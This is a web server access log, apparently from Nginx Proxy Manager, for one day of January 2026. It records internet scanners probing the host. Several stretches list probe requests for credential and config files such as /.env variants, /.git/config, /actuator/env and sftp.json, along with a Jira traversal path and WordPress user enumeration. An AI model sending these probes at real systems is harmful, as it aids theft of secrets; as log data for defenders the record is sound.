+[26/Jan/2026:08:53:07 +0000] 405 - POST http 91.82.215.191 "/" [Client 95.164.5.48] [Length 556] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" +[26/Jan/2026:09:16:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:09:17:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:09:27:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:09:28:32 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:09:34:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:09:36:41 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7" "-" +[26/Jan/2026:09:36:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:09:42:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:09:52:54 +0000] 400 - GET http 91.82.215.191 "/" [Client 167.94.138.191] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[26/Jan/2026:09:52:56 +0000] 400 - - http localhost "-" [Client 167.94.138.191] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:09:53:05 +0000] 400 - GET http 91.82.215.191 "/.well-known/security.txt" [Client 167.94.138.191] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[26/Jan/2026:10:03:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.147.221.140] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:10:03:14 +0000] 405 - OPTIONS http 91.82.215.191 "/" [Client 34.147.221.140] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:10:07:20 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[26/Jan/2026:10:09:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:10:13:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:10:15:08 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:10:15:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 35.170.216.165] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[26/Jan/2026:10:19:47 +0000] 200 - GET http 091.082.215.191 "/" [Client 47.245.82.56] [Length 1033] [Gzip -] "curl/7.78.0" "-" +[26/Jan/2026:10:21:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:10:23:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:10:23:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:10:29:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:15:50:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:15:57:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:15:58:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[26/Jan/2026:16:02:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:16:07:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.170.113.236] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[26/Jan/2026:16:08:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:16:14:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:16:18:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:16:24:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 35.195.241.97] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[26/Jan/2026:16:25:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:16:39:31 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:16:40:09 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[26/Jan/2026:16:53:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:16:53:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:16:53:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 68.183.180.73] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:16:53:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 68.183.180.73] [Length 1033] [Gzip -] "-" "-" +[26/Jan/2026:16:53:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 68.183.180.73] [Length 1033] [Gzip -] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:50 +0000] 404 - GET http 91.82.215.191 "/server" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:51 +0000] 404 - GET http 91.82.215.191 "/server-status" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:53 +0000] 404 - GET http 91.82.215.191 "/about" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:54 +0000] 404 - GET http 91.82.215.191 "/login.action" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:55 +0000] 404 - GET http 91.82.215.191 "/_all_dbs" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:56 +0000] 404 - GET http 91.82.215.191 "/v2/_catalog" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:57 +0000] 404 - GET http 91.82.215.191 "/.DS_Store" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:58 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:53:59 +0000] 404 - GET http 91.82.215.191 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:02 +0000] 404 - GET http 91.82.215.191 "/login?redir=/ng" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:04 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:05 +0000] 404 - POST http 91.82.215.191 "/graphql" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:06 +0000] 404 - POST http 91.82.215.191 "/api" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:06 +0000] 404 - POST http 91.82.215.191 "/api/graphql" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:07 +0000] 404 - POST http 91.82.215.191 "/graphql/api" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:08 +0000] 404 - POST http 91.82.215.191 "/api/gql" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 68.183.180.73] [Length 568] [Gzip 1.86] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:10 +0000] 404 - GET http 91.82.215.191 "/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:11 +0000] 404 - GET http 91.82.215.191 "/config.json" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:13 +0000] 404 - GET http 91.82.215.191 "/telescope/requests" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:14 +0000] 404 - GET http 91.82.215.191 "/info.php" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:15 +0000] 404 - GET http 91.82.215.191 "/actuator/env" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:17 +0000] 404 - GET http 91.82.215.191 "/swagger-ui.html" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:18 +0000] 404 - GET http 91.82.215.191 "/swagger/index.html" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:19 +0000] 404 - GET http 91.82.215.191 "/swagger/swagger-ui.html" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:20 +0000] 404 - GET http 91.82.215.191 "/webjars/swagger-ui/index.html" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:21 +0000] 404 - GET http 91.82.215.191 "/swagger.json" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:23 +0000] 404 - GET http 91.82.215.191 "/swagger/v1/swagger.json" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:24 +0000] 404 - GET http 91.82.215.191 "/v2/api-docs" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:25 +0000] 404 - GET http 91.82.215.191 "/v3/api-docs" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:26 +0000] 404 - GET http 91.82.215.191 "/api-docs/swagger.json" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:27 +0000] 404 - GET http 91.82.215.191 "/api/swagger.json" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:28 +0000] 404 - GET http 91.82.215.191 "/@vite/env" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:29 +0000] 404 - GET http 91.82.215.191 "/.vscode/sftp.json" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:30 +0000] 200 - GET http 91.82.215.191 "/?rest_route=/wp/v2/users/" [Client 68.183.180.73] [Length 568] [Gzip 1.86] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:16:54:31 +0000] 404 - GET http 91.82.215.191 "/debug/default/view?panel=config" [Client 68.183.180.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[26/Jan/2026:17:03:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:17:05:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:17:07:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:17:18:03 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:17:18:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:17:20:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:17:43:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:17:45:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 66.132.153.127] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[26/Jan/2026:17:45:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.127] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:17:45:48 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[26/Jan/2026:17:45:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.127] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:17:45:52 +0000] 404 - GET http 91.82.215.191 "/wiki" [Client 66.132.153.127] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[26/Jan/2026:17:45:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.127] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:17:47:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:17:53:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:17:58:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:18:01:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:04:22 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:05:24 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.2.2; GT-I9505 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36" "-" +[26/Jan/2026:18:05:27 +0000] 404 - GET http 91.82.215.191 "/admin/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" "-" +[26/Jan/2026:18:05:28 +0000] 404 - GET http 91.82.215.191 "/api/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; yie; rv:11.0) like Gecko" "-" +[26/Jan/2026:18:05:28 +0000] 404 - GET http 91.82.215.191 "/app/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" "-" +[26/Jan/2026:18:05:28 +0000] 404 - GET http 91.82.215.191 "/backend/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MDDRJS)" "-" +[26/Jan/2026:18:05:28 +0000] 404 - GET http 91.82.215.191 "/demo/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" "-" +[26/Jan/2026:18:05:29 +0000] 404 - GET http 91.82.215.191 "/dev/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" "-" +[26/Jan/2026:18:05:31 +0000] 404 - GET http 91.82.215.191 "/staging/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7" "-" +[26/Jan/2026:18:05:31 +0000] 404 - GET http 91.82.215.191 "/mail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.64 (Windows NT 6.1; U; de) Presto/2.1.1" "-" +[26/Jan/2026:18:05:31 +0000] 404 - GET http 91.82.215.191 "/m/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36" "-" +[26/Jan/2026:18:05:32 +0000] 404 - GET http 91.82.215.191 "/remote/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy)" "-" +[26/Jan/2026:18:05:32 +0000] 404 - GET http 91.82.215.191 "/webmail/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16" "-" +[26/Jan/2026:18:05:32 +0000] 404 - GET http 91.82.215.191 "/server/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23" "-" +[26/Jan/2026:18:05:32 +0000] 404 - GET http 91.82.215.191 "/vpn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;Trident/5.0)" "-" +[26/Jan/2026:18:05:33 +0000] 404 - GET http 91.82.215.191 "/secure/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.3 (KHTML, like Gecko) Version/10.0 Mobile/14C5062e Safari/602.1" "-" +[26/Jan/2026:18:05:34 +0000] 404 - GET http 91.82.215.191 "/shop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1" "-" +[26/Jan/2026:18:05:34 +0000] 404 - GET http 91.82.215.191 "/cloud/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" "-" +[26/Jan/2026:18:05:34 +0000] 404 - GET http 91.82.215.191 "/portal/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20" "-" +[26/Jan/2026:18:05:34 +0000] 404 - GET http 91.82.215.191 "/host/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; HotbarSearchToolbar 1.1; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET4.0C)" "-" +[26/Jan/2026:18:05:35 +0000] 404 - GET http 91.82.215.191 "/support/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "SuperBot/4.4.0.60 (Windows XP)" "-" +[26/Jan/2026:18:05:35 +0000] 404 - GET http 91.82.215.191 "/pop/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[26/Jan/2026:18:05:35 +0000] 404 - GET http 91.82.215.191 "/store/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.80" "-" +[26/Jan/2026:18:05:35 +0000] 404 - GET http 91.82.215.191 "/cdn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 5.12 [en]" "-" 